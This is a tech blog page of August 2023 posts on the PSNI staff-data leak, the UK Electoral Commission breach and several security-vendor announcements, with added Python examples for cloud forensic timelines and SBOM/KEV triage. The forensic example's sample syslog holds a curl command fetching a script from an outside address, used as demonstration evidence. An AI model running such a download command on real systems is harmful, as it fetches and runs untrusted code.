The Police Service of Northern Ireland REALLY Screws Up And Publishes The Data Of ALL ITS STAFF

Posted in Commentary with tags on August 9, 2023 by itnerd

The good news is that The Police Service Of Northern Ireland didn’t get pwned by hackers. But the bad news is they might as well have been. I say that because they really screwed up and accidentally published the data on all their staff, creating a critical incident in the process:

The Police Service of Northern Ireland (PSNI) earlier apologised for the self-inflicted security breach after it inadvertently published the information in response to a Freedom of Information (FOI) request on Tuesday.

The breach involved the surname, initials, the rank or grade, the work location and departments of all PSNI staff, but did not involve the officers’ and civilians’ private addresses.

Alliance Party leader Naomi Long said it was a concern that a member of staff, who she understands to be “relatively junior”, had access to the sensitive data.

PSNI said its chief constable Simon Byrne is cutting his family holiday short to deal with the crisis and is expected to answer questions from politicians.

This is bad. This is very bad. Why is this bad? Here’s why:

The information, which was available online for up to three hours, revealed members of the organised crime unit, intelligence officers stationed at ports and airports, officers in the surveillance unit and almost 40 PSNI staff based at MI5’s headquarters in Holywood, the Belfast Telegraph reported.

Clearly there was no process in place to limit who has access to this data. Nor were there any checks to make sure that the data was safe to release. This is another one of those cases where heads need to roll over this because I cannot imagine what the members of this police service are going through knowing that some of their personal information is out there right now.

#EpicFail

Vicarius Introduces vuln_GPT

Posted in Commentary with tags on August 9, 2023 by itnerd

Vicarius, developers of the industry’s first fully autonomous end-to-end vulnerability remediation platform, today announced the launch of vuln_GPT, the world’s first Large Language Model (LLM) trained to generate remediation scripts for software vulnerabilities in the race to find and fix vulnerabilities faster than hackers. The vuln_GPT engine will be freely offered within vsociety, Vicarius’ social community for security researchers. vuln_GPT scripts can then easily be deployed as part of its vRx solution that allows instant remediation of vulnerabilities.

In the ever-evolving digital landscape, there are currently 200,000 vulnerabilities detected in total, with ten percent (10%) discovered in the last year and increasing at an exponential pace. Manually identifying and handling zero-days is a heavy burden, requiring significant daily manpower. In the recent MOVEit vulnerability example, almost 60 days after identifying the first vulnerability, a quarter of the affected organizations still remain vulnerable. The advent of the latest AI-driven cyber threats, such as WormGPT, makes it even harder to detect and block these threats.

When it comes to vulnerability management solutions, legacy vendors lean heavily on the assessment and detection side of the house, but have failed to pay appropriate attention to the remediation aspect. Remediation is already a complex process, and security teams remain cautious when applying vendor patches in fear of causing outages or downtime to their systems. Even if a patch is available, they will often undergo a waiting period in order to minimize any potential risk.

Enter vuln_GPT. This new AI-powered remediation engine can automatically generate a remediation script to execute a number of actions. For example, scripts can remove a file, close a port, disable a protocol, or initiate a compensating control. These are all strategies that can provide a sturdy and reliable fix while vendors work on releasing a patch or while security teams test one in a lab environment. Further, because vuln_GPT works without human intervention, it also makes vulnerability detection and remediation faster and more cost effective, without the need for large research teams or highly skilled security engineers, saving time and money.

Recently, there were critical zero-day vulnerabilities discovered in Terrestrial Trunked Radio (TETRA), a radio communications protocol widely used by government, law enforcement and military organizations worldwide. While some of the vulnerabilities can be fixed through firmware updates, others can’t and are more difficult to mitigate, in particular a backdoor in CVE-2022-24402 that can expose sensitive information. Using vuln_GPT, Vicarius takes the manual work out of identifying and applying the most effective compensating controls.

With vuln_GPT, Vicarius ushers in the era of AI-generated scripts to mitigate CVEs and helps to significantly close the gap between detection and remediation. MTTD (mean time to detect) remains a prominent issue for IT teams, but MTTR presents an even bigger challenge, since most teams are not well equipped to fix vulnerabilities quickly.

vuln_GPT enables security teams to quickly fix critical issues, significantly decrease their time to react, cut down the costly aftermath of an incident, and reduce MTTD and MTTR. Vicarius believes the timing is right to help solve the skills gap, particularly when in-house research teams are short staffed and under-resourced.

Email threats continue to increase in first half of 2023: Trend Micro 

Posted in Commentary with tags on August 9, 2023 by itnerd

Today, Trend Micro released its midyear cybersecurity threat report, which found that in the first half of 2023, Trend Micro blocked more than 85 billion threats globally consisting of email threats, malicious files, and malicious URLs, a 27% year-over-year increase.

In Canada, the detection of attacks from ransomware-as-a-service surged in the first half of 2023. To date, Trend Micro has blocked 394,518,518 email threat attempts in Canada, 24.6% more than last year.

As AI adoption continues to grow at a stable pace, ransomware groups will become more creative. Findings show cybercriminals are turning to AI-enabled tools to simplify enacting scams, automate refining targets, and increase scalability with a crop of new crimes.

You can read the full report here: Stepping Ahead of Risk: Trend Micro 2023 Midyear Cybersecurity Threat Report

Uber Eats is now available for teen accounts

Posted in Commentary with tags on August 9, 2023 by itnerd

Today, Uber Eats is now available for teen accounts—meaning parents and guardians now have one less thing to worry about. Whether their teen needs a meal to refuel after practice or brain food to help them through a study session, parents and guardians can relax knowing their teen has a way to feed themselves, even if they’re not around. 

How Uber Eats for teens works:

  • Deliveries from highly rated delivery people: Orders through teen accounts will always be delivered by highly rated delivery people. 
  • Teen-friendly view: Age-restricted items like alcohol will be filtered out.

Here is what a regular account view looks like:

Here is what a teen account view looks like:

  • Live tracking and real-time alerts: Anytime an order is placed through a teen account, the parent or guardian will receive real-time status updates from pickup to drop off. 
  • Support at your fingertips: If for whatever reason something goes wrong, the parent or guardian and the teen will be able to submit a support ticket in the app. 

Teen accounts enabled by parents and guardians will now provide access to Uber Eats and Uber Rides.  Launched earlier this year, teen accounts with Rides are designed for families on the go with safety features built into the experience for parents/guardians, teenage riders, and drivers. When a teen requests a trip, parents/guardians will be notified, can watch the trip right in their Uber app, and contact their teen or the driver. In addition, Uber safety features – like audio recording, live trip tracking, and PIN Verification to help make sure your teen is getting in the right car – will be mandatory. Only highly rated, experienced drivers will be able to receive requests for trips with teens, and drivers can always choose to stop receiving these trip requests. In case of an emergency, parents/guardians will have the ability to call 911 directly from the trip tracker screen. 

The UK Electoral Commission Was Pwned And The Pwnage Was Not Immediately Disclosed To The Public

Posted in Commentary with tags on August 9, 2023 by itnerd

The UK’s Electoral Commission revealed a cyber attack which allowed unknown threat actors access to the data of 40 million voters. It gets worse though. This pwnage went unnoticed for a year and was not disclosed to the public for an additional 10 months.

The Electoral Commission apologized for the security breach in which the names and addresses of all voters registered between 2014 and 2022 were open to “hostile actors” as far back as August 2021. The attack was discovered last October and reported within 72 hours to the Information Commissioner’s Office (ICO), as well as the National Crime Agency. However, the public has only now been informed that the electoral registers containing the data of millions of voters may have been accessible throughout that time. 

The Electoral Commission said it was “not able to know conclusively” what information had been accessed. It is not known whether the attackers were linked to a hostile state, such as Russia, or a criminal cyber gang. The watchdog said “much of the data” was already in the public domain and insisted it would be difficult for anyone to influence the outcome of the UK’s largely paper-based electoral system, but it acknowledged that voters would still be concerned. 

The attackers were able to access full copies of the electoral registers, held by the commission for research purposes and to enable permissibility checks on political donations. These registers include the name and address of anyone in the UK who was registered to vote between 2014 and 2022. The commission’s email system was also accessible during the attack. The full register held by the Electoral Commission contains name and address data that can be inspected by the public but only locally through electoral registration officers, with only handwritten notes allowed. The information is not permitted to be used for commercial or marketing purposes. The data of anonymous voters whose details are private for safety reasons and the addresses of overseas voters were not accessible to the intruders in the IT system. 

All together now…. Whiskey Tango Foxtrot????

This is an epic screw up and heads need to roll over it because it is totally unacceptable that data on 40 million people is out there in the hands of someone to do whatever nefarious things they plan on doing with it. Apologies are not enough. Actions to ensure that this never happens again along with having those who let this happen pay the price are the only way to stop epic screw ups like this going forward.

Appdome Launches Cyber Community Program with Pen Testers Around the World

Posted in Commentary with tags on August 9, 2023 by itnerd

Appdome, the one-stop shop for mobile app defense, today announced the launch of its new Mobile App Defense Project, a community program aimed at improving mobile DevSecOps through collaboration with more than 50 renowned mobile app penetration testers around the world. This initiative aims to foster a more secure mobile app economy, raise the bar on mobile app defense and provide rapid, validated, continuous cyber and anti-fraud solutions for all mobile applications globally.

As mobile application use and revenues continue to rise dramatically, mobile application security testing has become a hot topic and fast emerging discipline in the economic landscape. Cyber threats, attacks, tools, methods, and techniques targeting Android & iOS apps, infrastructures and users continue to evolve and proliferate. The Mobile App Defense Project is designed to harness the collective strength of the global pen testing community to provide cutting-edge cybersecurity, anti-fraud, anti-malware and other solutions in mobile applications worldwide.  

Through this program, Appdome will collaborate and share research with leading mobile app penetration testing companies, renowned for their expertise in identifying exploits, vulnerabilities and conducting rigorous security assessments of Android & iOS applications. Appdome will also integrate the recommendations provided by these partners into Appdome’s cyber defense automation platform to deepen and accelerate mobile app defenses for all mobile brands.  

As a community project, Appdome will also contribute cyber and threat research to the community as well as fund education, awareness, and other programs to benefit mutual customers and the broad cyber community defending mobile brands, businesses, and users.  

Some of the founding members of the Mobile App Defense Project include:

Guest Post: Online Identity & Privacy Protection Tips For Children

Posted in Commentary with tags on August 9, 2023 by itnerd

By Ani Chaudhuri, CEO, Dasera

Beyond the usual guidelines, there are several innovative and layered approaches that parents might not have considered:

  • Digital Footprint Starts at Birth: Avoid sharing identifiable information about your child on public platforms. This includes full names, birth dates, and locations. A harmless birth announcement can offer malicious actors a starting point.
  • Rethink “Smart” Toys: Before purchasing, scrutinize the data handling practices of internet-connected toys. Many collect vast amounts of information, and not all have stringent security measures.
  • Understand School Data Handling: Engage with your child’s school to understand how they store, use, and protect student data. Often, educational platforms have data vulnerabilities or share information with third parties.
  • Voice-Activated Devices: Devices like Siri or Alexa constantly listen for activation cues. Ensure they aren’t inadvertently recording your child’s conversations or information.
  • Online Gaming: Even games designed for younger children can have chat features. Ensure these are disabled or monitored. Personal information can be unintentionally shared during seemingly innocent in-game conversations.

From the moment they are born. It may sound extreme, but children have a digital identity almost from birth in our current digital era. Whether it’s hospital records, pediatrician visits, or the first photo shared on social media, their digital footprint begins immediately. Each of these instances carries data – a golden ticket for identity thieves. Protecting a child’s ID isn’t just about preventing financial fraud; it’s about safeguarding their entire digital existence and future reputation.

Child ID and privacy isn’t just about what parents should do; it’s equally about the don’ts and nevers:

  • Never Use Their Name for Passwords: Using a child’s name or birthdate as a password for any online service is a glaring risk. It’s often the first thing hackers will try.
  • Don’t Overlook Data Breaches: Not all data breaches make headlines. Watch for breaches involving services your child uses and act accordingly.
  • Never Assume a Platform is Safe: Just because a platform is designed for children doesn’t mean it’s secure. Constantly scrutinize its data practices.
  • Don’t Underestimate Word of Mouth: Children learn much from their peers. Educate them about the basics of data privacy so they can be advocates among their friends.

Protecting a child’s ID and privacy in today’s world requires vigilance, continuous education, and proactive measures. It’s not just about today’s threats but also about preventing potential risks in the future. Parents must be the first line of defense, even if it means challenging the status quo of digital interaction.

Guest Post: Supercharging Investigations With Cado’s New Timeline 

Posted in Commentary with tags on August 9, 2023 by itnerd

While many organizations have doubled down on cloud security in recent years, most still wrestle with closing the gap between detection and response. Once malicious activity has been identified, it can feel nearly impossible to understand the true scope and impact. 

When it comes to incident response, the more data sources you can analyze in aggregate, the better your investigation will be; however, this isn’t easy – especially in the case of complex, multi-cloud environments. In Azure alone there are over 200 products and services, each with their own set of best practices and data sources. Each cloud provider has their own terminology, security tools, monitoring logs, and APIs, making it extremely difficult for analysts to know which data sources are most valuable to capture, how to capture them, and moreover, how to best investigate them. 

Naturally, security teams have attempted to apply legacy investigation tools and processes to the cloud, but deep-dive investigations are still too complicated and time consuming. In many cases, analysts need to use a patchwork of legacy and open-source tools and resort to spreadsheets to piece together an investigation. Worse, due to the amount of time and resources required to perform forensics in the cloud, security teams often don’t have the cycles to do an investigation as frequently as they feel is necessary, leaving the organization vulnerable to risk. 

Cado’s mission is to provide security teams with a faster and smarter way to perform forensics investigations in the cloud. The Cado platform harnesses automation at its core to expedite the end-to-end incident response process. When it comes to the investigation itself, the platform automatically presents key incident details including a full timeline of events, saving analysts weeks of time that would have been spent in spreadsheets. Cado’s timeline feature provides analysts with a unified view of hundreds of data sources across cloud-provider logs, disk, memory and more. Further, the Cado timeline supports cross-cloud evidence items to be viewed in a single pane of glass in cases where an incident spans multiple public cloud environments. This level of contextual awareness is vital in understanding the impact and scope of an incident. 

As part of this latest product release, Cado has introduced additional enhancements to its timeline feature to help security teams further supercharge investigations and reduce Mean Time To Response (MTTR). Here’s an overview of the most recently released timeline functionality:

New Timeline View

Cado is excited to have revamped the look and feel of the timeline feature so that it is more intuitive to navigate and pivot off key artifacts during an investigation. From card view to a powerful tabular view, we hope this will greatly streamline the analysis process. This new view also aligns with our mission to make forensics more approachable so that analysts of all levels can perform incident response in the cloud. 

Faceted Search

Faceted search will allow users to narrow down their search results quickly using facet options, which represent categories of data. The facet options Cado presents will provide awareness to the user on the core data types/attributes the events contain, enabling them to refine datasets quickly and efficiently using the facet navigation, rather than having to add filters to their query in the search bar manually, which can burden the user.

Saved Search

Saved search will allow users to save investigation queries for re-use at a later date. During an investigation, particularly in the earlier analysis phases, a user will be exploring and pivoting across datasets and will have naturally built-up a considerable query in the search bar. Users can now preserve this query so they can re-execute it on their next session (or even share it with colleagues). This feature will save precious investigation time by not having to rebuild a query from scratch, thus enabling rapid search and visibility.
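To make the three features above concrete (a unified timeline across evidence types, facets computed from the normalised events, and a saved search that can be re-run or shared), here is an added example that is not Cado’s code. It normalises constructed sample records from three sources (cloud audit log JSON, host syslog, and a disk-timeline row) into one UTC-ordered timeline, counts facets over it, and serialises a filter set as a saved search. The year and the host’s UTC+2 clock used for the syslog lines, the host name `web01` attached to the disk artifact, and all log contents are assumptions made for the sample.

```python
from __future__ import annotations
import json
import re
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timezone, timedelta

SYSLOG_YEAR = 2023                        # assumption: classic syslog lines carry no year
SYSLOG_TZ = timezone(timedelta(hours=2))  # assumption: the host clock runs at UTC+2

# Constructed sample evidence (not real incident data).
CLOUD_AUDIT = [
    '{"eventTime": "2023-08-09T10:02:11Z", "eventName": "ConsoleLogin", '
    '"userIdentity": {"userName": "svc-deploy"}, "sourceIPAddress": "198.51.100.7"}',
    '{"eventTime": "2023-08-09T10:05:40Z", "eventName": "CreateAccessKey", '
    '"userIdentity": {"userName": "svc-deploy"}, "sourceIPAddress": "198.51.100.7"}',
]
SYSLOG = [
    "Aug  9 12:03:55 web01 sshd[2211]: Accepted publickey for deploy from 198.51.100.7 port 51022 ssh2",
    "Aug  9 12:04:10 web01 sudo: deploy : TTY=pts/0 ; COMMAND=/usr/bin/curl http://203.0.113.9/x.sh",
]
DISK = [(1691575470, "/tmp/x.sh")]  # (mtime as UTC epoch, path) from a file-system timeline of web01


@dataclass(frozen=True)
class Event:
    ts: datetime     # always UTC after normalisation
    source: str      # which evidence item the event came from
    event_type: str
    actor: str
    origin: str      # source IP where known, else host name
    detail: str


def from_cloud_audit(line: str) -> Event:
    r = json.loads(line)
    ts = datetime.fromisoformat(r["eventTime"].replace("Z", "+00:00"))
    return Event(ts, "cloud-audit", r["eventName"], r["userIdentity"]["userName"],
                 r["sourceIPAddress"], json.dumps(r, sort_keys=True))


SYSLOG_RE = re.compile(r"^(\w{3})\s+(\d{1,2}) (\d\d:\d\d:\d\d) (\S+) ([^\[:]+)(?:\[\d+\])?: (.*)$")


def from_syslog(line: str) -> Event:
    m = SYSLOG_RE.match(line)
    if not m:
        raise ValueError(f"unparsed syslog line: {line!r}")
    mon, day, clock, host, prog, msg = m.groups()
    local = datetime.strptime(f"{SYSLOG_YEAR} {mon} {day} {clock}", "%Y %b %d %H:%M:%S")
    local = local.replace(tzinfo=SYSLOG_TZ)
    ssh = re.search(r"for (\S+) from (\S+)", msg)   # sshd "Accepted ... for USER from IP"
    sudo = re.match(r"(\S+) : ", msg)                # sudo "USER : TTY=... ; COMMAND=..."
    actor = ssh.group(1) if ssh else (sudo.group(1) if sudo else "")
    origin = ssh.group(2) if ssh else host
    return Event(local.astimezone(timezone.utc), "syslog", prog, actor, origin, msg)


def from_disk(row: tuple) -> Event:
    epoch, path = row
    return Event(datetime.fromtimestamp(epoch, tz=timezone.utc), "disk", "file-modified", "", "web01", path)


def build_timeline() -> list:
    """Merge every evidence source into one timeline ordered by UTC timestamp."""
    events = [from_cloud_audit(l) for l in CLOUD_AUDIT]
    events += [from_syslog(l) for l in SYSLOG]
    events += [from_disk(r) for r in DISK]
    return sorted(events, key=lambda e: e.ts)


def facets(events: list, keys=("source", "event_type", "actor", "origin")) -> dict:
    """Facet counts: for each attribute, how many events carry each value."""
    return {k: Counter(getattr(e, k) for e in events) for k in keys}


def save_search(filters: dict) -> str:
    """Serialise a facet filter set so it can be stored or handed to a colleague."""
    return json.dumps({"filters": {k: sorted(v) for k, v in filters.items()}})


def run_saved_search(events: list, saved: str) -> list:
    flt = {k: set(v) for k, v in json.loads(saved)["filters"].items()}
    return [e for e in events if all(getattr(e, k) in v for k, v in flt.items())]


if __name__ == "__main__":
    tl = build_timeline()
    for e in tl:
        print(e.ts.isoformat(), e.source, e.event_type, e.actor, e.origin)
    print(facets(tl)["source"])
    q = save_search({"origin": {"198.51.100.7"}})
    print(len(run_saved_search(tl, q)), "events from the pivot address")
```

The timezone conversion is the part that matters most: without it the syslog entries would sort after the cloud events and the apparent order of the intrusion would be wrong.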

If you’re interested in learning more, reach out to our team or take advantage of a 14-day free trial of the Cado platform! 

NetRise Introduces New Features for Managing SBOMs & CISA KEV Catalog Support  

Posted in Commentary with tags on August 9, 2023 by itnerd

NetRise, the company providing granular visibility into the world’s XIoT security problem, today announced advanced capabilities for maintaining and working with Software Bill of Materials (SBOMs) and support for the Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) Catalog for managing and understanding the risks associated with software components in the firmware of connected devices. 

As the security of the software and firmware supply chain and regulation around SBOMs continue to dominate the industry landscape, the impact of consuming and generating a list of ‘ingredients’ for each device cannot be overstated. With the continuing push for new standards to require visibility in the supply chain, device consumers and asset owners need a solution to enable them to streamline SBOM management and vulnerability prioritization efforts.

NetRise recognizes the current challenges in the market, enhancing its customers’ and partners’ ability to manage vulnerabilities effectively, and offers the solution these industry personas have been seeking: the ability to ingest and enrich SBOMs from multiple sources. This key capability helps device manufacturers and owners alike better manage the underlying components and vulnerabilities of XIoT devices.

With the growing prominence of KEVs, NetRise’s adoption of CISA’s KEV data provides users with an efficient method for prioritizing the most exploitable vulnerabilities. Today, a typical enterprise sorts through potentially hundreds of thousands of vulnerabilities, and the ability to prioritize remediation efforts based on exploitability alters the dynamics of device security. In 2022, about 30% of KEVs affected XIoT devices or software components used by XIoT devices. So far, in 2023, that figure is approximately 20%. Considering that any CVE could be on the KEV list, these are impressive numbers. 

Key benefits of these new features in the NetRise Platform include:

  • By overlaying CISA KEV catalog data, NetRise empowers a comprehensive understanding of known exploits to identify, address, and prioritize the most critical vulnerabilities.
  • The NetRise platform supports the ingestion of two major SBOM formats (SPDX and CycloneDX), enriches them with vulnerability information, and exports in either format for external use.
  • With a dark mode feature to minimize eye strain and enhance visibility in glare-prone environments, NetRise delivers an innovative interface design for improved user experience. 
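The two technical points in that list, ingesting a CycloneDX SBOM and overlaying KEV data so that known-exploited CVEs outrank merely high-scoring ones, look like this in an added example that is not NetRise’s code. It parses a constructed CycloneDX 1.4 document, joins it to a constructed vulnerability feed, loads a KEV subset written with the field names of CISA’s published JSON feed, ranks the findings, and writes them back as a CycloneDX `vulnerabilities` array. The SBOM, the feed, the `CVE-0000-*` identifiers and the `cisa:kev:dueDate` property name are all placeholders; only the CycloneDX side is shown, SPDX would need its own reader.

```python
from __future__ import annotations
import json
from dataclasses import dataclass

# Constructed CycloneDX 1.4-style SBOM for a fictional device (sample data, not a real firmware image).
CYCLONEDX_SBOM = json.dumps({
    "bomFormat": "CycloneDX", "specVersion": "1.4",
    "components": [
        {"type": "library", "bom-ref": "c1", "name": "libexample-ssl", "version": "1.0.2",
         "purl": "pkg:generic/libexample-ssl@1.0.2"},
        {"type": "library", "bom-ref": "c2", "name": "busybox-demo", "version": "1.31",
         "purl": "pkg:generic/busybox-demo@1.31"},
        {"type": "application", "bom-ref": "c3", "name": "webui", "version": "3.2",
         "purl": "pkg:generic/webui@3.2"},
    ],
})

# Constructed vulnerability feed: purl -> [(CVE id, CVSS score)]. The CVE ids are placeholders.
VULN_FEED = {
    "pkg:generic/libexample-ssl@1.0.2": [("CVE-0000-0001", 9.8), ("CVE-0000-0002", 5.3)],
    "pkg:generic/busybox-demo@1.31": [("CVE-0000-0003", 7.5)],
}

# Constructed KEV subset using the field names of CISA's JSON feed (values are made up).
KEV_CATALOG = json.dumps({
    "title": "sample KEV subset",
    "vulnerabilities": [
        {"cveID": "CVE-0000-0002", "dateAdded": "2023-07-01", "dueDate": "2023-07-22",
         "requiredAction": "Apply updates per vendor instructions.", "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-0000-0003", "dateAdded": "2023-06-15", "dueDate": "2023-07-06",
         "requiredAction": "Apply updates per vendor instructions.", "knownRansomwareCampaignUse": "Unknown"},
    ],
})


@dataclass(frozen=True)
class Finding:
    bom_ref: str     # CycloneDX bom-ref of the affected component
    component: str   # "name@version" for display
    cve: str
    cvss: float
    in_kev: bool
    kev_due: str     # CISA remediation due date, "" when not in KEV
    ransomware: str  # knownRansomwareCampaignUse, "" when not in KEV


def parse_cyclonedx(sbom_json: str) -> list:
    """Return the component list of a CycloneDX JSON document after checking the format marker."""
    doc = json.loads(sbom_json)
    if doc.get("bomFormat") != "CycloneDX":
        raise ValueError("not a CycloneDX document")
    return doc.get("components", [])


def load_kev(kev_json: str) -> dict:
    """Index a KEV catalog feed by cveID."""
    return {v["cveID"]: v for v in json.loads(kev_json)["vulnerabilities"]}


def enrich(components: list, vuln_feed: dict, kev: dict) -> list:
    """Join each component's CVEs to the KEV index."""
    out = []
    for c in components:
        for cve, cvss in vuln_feed.get(c.get("purl", ""), []):
            k = kev.get(cve)
            out.append(Finding(c["bom-ref"], f'{c["name"]}@{c["version"]}', cve, cvss, k is not None,
                               k["dueDate"] if k else "", k.get("knownRansomwareCampaignUse", "") if k else ""))
    return out


def prioritize(findings: list) -> list:
    """KEV entries first (earliest CISA due date first), then everything else by CVSS descending."""
    return sorted(findings, key=lambda f: (not f.in_kev, f.kev_due if f.in_kev else "", -f.cvss))


def export_cyclonedx(sbom_json: str, findings: list) -> str:
    """Write the findings back as a CycloneDX 1.4 'vulnerabilities' array so the enriched SBOM can be shared."""
    doc = json.loads(sbom_json)
    by_cve = {}
    for f in findings:
        entry = by_cve.setdefault(f.cve, {"id": f.cve, "ratings": [{"score": f.cvss, "method": "CVSSv31"}],
                                          "affects": []})
        entry["affects"].append({"ref": f.bom_ref})
        if f.in_kev and "properties" not in entry:  # placeholder property name, not a CycloneDX standard one
            entry["properties"] = [{"name": "cisa:kev:dueDate", "value": f.kev_due}]
    doc["vulnerabilities"] = list(by_cve.values())
    return json.dumps(doc, indent=2)


def triage(sbom_json: str = CYCLONEDX_SBOM, vuln_feed: dict = VULN_FEED, kev_json: str = KEV_CATALOG) -> list:
    return prioritize(enrich(parse_cyclonedx(sbom_json), vuln_feed, load_kev(kev_json)))


if __name__ == "__main__":
    for f in triage():
        print(f"{'KEV ' if f.in_kev else '    '}{f.cve} cvss={f.cvss} {f.component} due={f.kev_due or '-'}")
```

Note the ordering in the sample: the CVSS 5.3 issue on the KEV list is ranked ahead of the CVSS 9.8 issue that is not, which is exactly the shift from severity-driven to exploitability-driven prioritisation the announcement describes.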

For more information about NetRise’s presence at Black Hat USA 2023, please visit https://www.netrise.io/events. To learn more about these advancements and other capabilities of the NetRise platform, visit https://www.netrise.io/platform.

Google Canada commits $2.5 million to NPower Canada 

Posted in Commentary with tags on August 9, 2023 by itnerd

Today, Google Canada announced a $2.5 million commitment to NPower Canada, unlocking the opportunity to offer 5,000 needs-based scholarships to underserved job-seekers across Canada, to gain the skills required to access careers in tech.

The grant enables NPower Canada to integrate and deliver Google Career Certificates in both English and French as a core component of its workforce development programs. Google.org has been supporting NPower Canada since 2020, and prior to today, Google has committed close to $5 million to NPower Canada, which has helped over 4,000 underserved and financially barriered job seekers enroll in NPower Canada’s scholarship-based programs.

Here are two examples of people who benefitted from this initiative:

  • Olena Kotelnykova, Financial Clerk, the Town of Berwick – Berwick, Nova Scotia: Olena graduated from NPower Canada’s Junior IT Analyst program in January 2023 after making the difficult decision to migrate to Canada to escape the war in Ukraine. After arriving in Canada, she discovered NPower’s program which gave her the skills and experience to secure a role as a Financial Clerk at the Town of Berwick within three months of participating. The program not only gave her the expertise, but provided her with a strong community to lean on as she built her new life in Canada.
  • Han Hyung Lee, Customer Account Specialist, Shaw Communications – Vancouver, British Columbia: Originally from Hong Kong and seeking new opportunities overseas, Han struggled to land a job despite his previous experience. This inspired him to enroll in the program with NPower Canada. With guidance, he was able to overcome barriers in his job search and integrate himself into the IT community in Vancouver. Han graduated from NPower’s Junior IT Analyst Program with a Google IT Support Professional Certificate that helped him land a role as a Customer Account Specialist with Shaw Communications. 

More information can be found in Google’s press release and blog post.